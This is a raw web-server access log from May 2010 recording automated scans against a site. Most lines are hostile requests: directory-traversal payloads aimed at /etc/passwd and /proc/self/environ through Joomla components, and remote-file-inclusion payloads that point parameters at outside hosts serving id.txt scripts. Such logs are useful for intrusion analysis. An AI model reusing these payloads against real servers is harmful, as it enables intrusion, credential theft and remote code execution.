74.55.96.234 - - [28/May/2010:06:35:27 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:35:41 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:35:41 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:35:45 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:35:46 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:35:46 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
74.55.96.234 - - [28/May/2010:06:35:46 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.836"
217.116.47.110 - - [28/May/2010:06:36:10 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:36:11 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:36:11 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:36:11 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:36:56 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:36:57 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:37:01 -0500] "GET /logs//index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
217.116.47.110 - - [28/May/2010:06:37:01 -0500] "GET //index.php?option=com_ccnewsletter&controller=../../..../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
207.46.199.44 - - [28/May/2010:06:37:59 -0500] "GET /logs/access_log.1211414400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.55 - - [28/May/2010:06:38:28 -0500] "GET /logs/access_log.1196208000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.91.234.162 - - [28/May/2010:06:40:57 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:40:58 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:40:59 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:00 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:01 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:02 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:03 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:05 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:06 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:07 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:08 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:09 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:10 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 316 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:10 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:11 -0500] "GET /*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:12 -0500] "GET /*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:13 -0500] "GET /*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:14 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:16 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:17 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:19 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:20 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:21 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:22 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:23 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:24 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:24 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:26 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:27 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:28 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:29 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:30 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:31 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:32 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:33 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:34 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:35 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:37 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
64.91.234.162 - - [28/May/2010:06:41:38 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
186.28.232.13 - - [28/May/2010:06:43:29 -0500] "GET /logs/access_log.1205107200//errors.php?error=http://home.eduhi.at/teacher/lebendige-schule/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
186.28.232.13 - - [28/May/2010:06:43:29 -0500] "GET //errors.php?error=http://home.eduhi.at/teacher/lebendige-schule/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
186.28.232.13 - - [28/May/2010:06:43:29 -0500] "GET /logs//errors.php?error=http://home.eduhi.at/teacher/lebendige-schule/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.55.146.200 - - [28/May/2010:06:47:21 -0500] "GET /logs/access_log.1274227200//errors.php?error=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
72.55.146.200 - - [28/May/2010:06:47:21 -0500] "GET //errors.php?error=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
72.55.146.200 - - [28/May/2010:06:47:21 -0500] "GET /logs//errors.php?error=http://www.act.scouts.asn.au/SazCart/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
87.250.255.243 - - [28/May/2010:06:48:16 -0500] "GET /logs/access_log.1265673600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
200.61.185.200 - - [28/May/2010:06:48:24 -0500] "GET /?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
200.61.185.200 - - [28/May/2010:06:48:28 -0500] "GET /logs/access_log.1270512000/?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.61.185.200 - - [28/May/2010:06:48:38 -0500] "GET /logs/?sourcedir=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 7289 "-""Mozilla/5.0"
91.142.208.158 - - [28/May/2010:06:50:31 -0500] "GET /logs/access_log.1205107200//errors.php?error=http://www.thailandskymall.com/picture/kocok.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
91.142.208.158 - - [28/May/2010:06:50:31 -0500] "GET /logs/access_log.1205107200//errors.php?error=http://www.thailandskymall.com/picture/kocok.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
91.142.208.158 - - [28/May/2010:06:50:31 -0500] "GET //errors.php?error=http://www.thailandskymall.com/picture/kocok.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
91.142.208.158 - - [28/May/2010:06:50:31 -0500] "GET //errors.php?error=http://www.thailandskymall.com/picture/kocok.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
91.142.208.158 - - [28/May/2010:06:50:31 -0500] "GET /logs//errors.php?error=http://www.thailandskymall.com/picture/kocok.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
91.142.208.158 - - [28/May/2010:06:50:31 -0500] "GET /logs//errors.php?error=http://www.thailandskymall.com/picture/kocok.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
67.195.112.180 - - [28/May/2010:06:51:46 -0500] "GET /tattoo/set1.htm HTTP/1.0" 200 2362 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
174.133.201.194 - - [28/May/2010:06:51:55 -0500] "GET /logs/index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:06:51:55 -0500] "GET /index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.13.136 - - [28/May/2010:06:51:58 -0500] "GET /logs/access_log.1224374400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.244.69.101 - - [28/May/2010:06:59:50 -0500] "GET /logs/index2.php?x=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.244.69.101 - - [28/May/2010:06:59:50 -0500] "GET /index2.php?x=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.46.195.239 - - [28/May/2010:07:00:58 -0500] "GET /logs/access_log.1182556800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.217.37 - - [28/May/2010:07:01:22 -0500] "GET /logs/ihm.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 296 "-""libwww-perl/5.805"
174.121.217.37 - - [28/May/2010:07:01:22 -0500] "GET /ihm.php?p=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 291 "-""libwww-perl/5.805"
174.121.57.1 - - [28/May/2010:07:02:30 -0500] "GET /login.php?includedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
216.97.225.115 - - [28/May/2010:07:02:49 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.814"
216.97.225.115 - - [28/May/2010:07:02:49 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.814"
174.121.217.37 - - [28/May/2010:07:03:25 -0500] "GET /logs/index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
174.121.217.37 - - [28/May/2010:07:03:25 -0500] "GET /index2.php?x=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
208.83.209.15 - - [28/May/2010:07:03:51 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
208.83.209.15 - - [28/May/2010:07:03:51 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.250.255.243 - - [28/May/2010:07:03:51 -0500] "GET /logs/access_log.1235433600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.97.225.115 - - [28/May/2010:07:05:29 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.814"
175.107.158.230 - - [28/May/2010:07:06:39 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
175.107.158.230 - - [28/May/2010:07:06:39 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
175.107.158.230 - - [28/May/2010:07:06:43 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
175.107.158.230 - - [28/May/2010:07:06:43 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.823"
174.133.201.194 - - [28/May/2010:07:07:05 -0500] "GET /logs//index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:07:07:05 -0500] "GET //index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
174.121.57.1 - - [28/May/2010:07:07:11 -0500] "GET /logs/access_log.1223683200/login.php?includedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.57.1 - - [28/May/2010:07:07:11 -0500] "GET /login.php?includedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.57.1 - - [28/May/2010:07:07:11 -0500] "GET /logs/login.php?includedir=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
213.196.180.250 - - [28/May/2010:07:07:17 -0500] "GET //errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
213.196.180.250 - - [28/May/2010:07:07:17 -0500] "GET /logs//errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
213.196.180.250 - - [28/May/2010:07:07:17 -0500] "GET /logs/access_log.1205107200//errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
207.46.199.55 - - [28/May/2010:07:09:58 -0500] "GET /logs/access_log.1215734400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.55.43.66 - - [28/May/2010:07:10:10 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.43.66 - - [28/May/2010:07:10:10 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
95.211.18.156 - - [28/May/2010:07:10:22 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
95.211.18.156 - - [28/May/2010:07:10:22 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.97.225.115 - - [28/May/2010:07:12:10 -0500] "GET /logs/access_log.1273363200//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.814"
216.97.225.115 - - [28/May/2010:07:12:10 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.814"
216.97.225.115 - - [28/May/2010:07:12:10 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.814"
122.112.32.51 - - [28/May/2010:07:13:01 -0500] "GET /logs/access_log.1271548800//config/dbutil.bck.php?confdir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
122.112.32.51 - - [28/May/2010:07:13:01 -0500] "GET //config/dbutil.bck.php?confdir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
122.112.32.51 - - [28/May/2010:07:13:02 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.97.225.115 - - [28/May/2010:07:13:39 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.814"
216.97.225.115 - - [28/May/2010:07:13:39 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.814"
122.112.32.51 - - [28/May/2010:07:13:41 -0500] "GET /logs/access_log.1271289600//config/dbutil.bck.php?confdir=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.132.187.170 - - [28/May/2010:07:13:45 -0500] "GET /logs/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.65"
211.132.187.170 - - [28/May/2010:07:13:45 -0500] "GET /index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.65"
216.97.225.115 - - [28/May/2010:07:14:05 -0500] "GET /logs/access_log.1273017600//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.814"
93.174.120.30 - - [28/May/2010:07:14:20 -0500] "GET /logs//?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 7294 "-""libwww-perl/5.831"
93.174.120.30 - - [28/May/2010:07:14:20 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.97.225.115 - - [28/May/2010:07:15:33 -0500] "GET //?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.814"
207.46.13.142 - - [28/May/2010:07:16:28 -0500] "GET /logs/access_log.1204416000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [28/May/2010:07:16:58 -0500] "GET /logs/access_log.1264809600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.193 - - [28/May/2010:07:19:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.93.174.47 - - [28/May/2010:07:21:06 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:07:21:06 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
204.93.174.47 - - [28/May/2010:07:21:06 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.51.42.60 - - [28/May/2010:07:22:24 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:07:22:24 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:07:22:24 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
72.51.42.60 - - [28/May/2010:07:22:24 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.810"
187.45.193.159 - - [28/May/2010:07:23:38 -0500] "GET /logs//index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [28/May/2010:07:23:39 -0500] "GET //index.php?option=com_mtfireeagle&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.133.201.194 - - [28/May/2010:07:23:52 -0500] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
174.133.201.194 - - [28/May/2010:07:23:52 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
187.45.193.159 - - [28/May/2010:07:24:56 -0500] "GET /logs/*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
187.45.193.159 - - [28/May/2010:07:24:57 -0500] "GET /*.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.805"
213.201.229.8 - - [28/May/2010:07:25:00 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
213.201.229.8 - - [28/May/2010:07:25:00 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.195.112.180 - - [28/May/2010:07:25:28 -0500] "GET /logs/access_log.1265846400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.104.108 - - [28/May/2010:07:25:35 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:25:35 -0500] "GET /logs/index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
91.121.104.108 - - [28/May/2010:07:25:35 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
91.121.145.89 - - [28/May/2010:07:25:35 -0500] "GET /index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
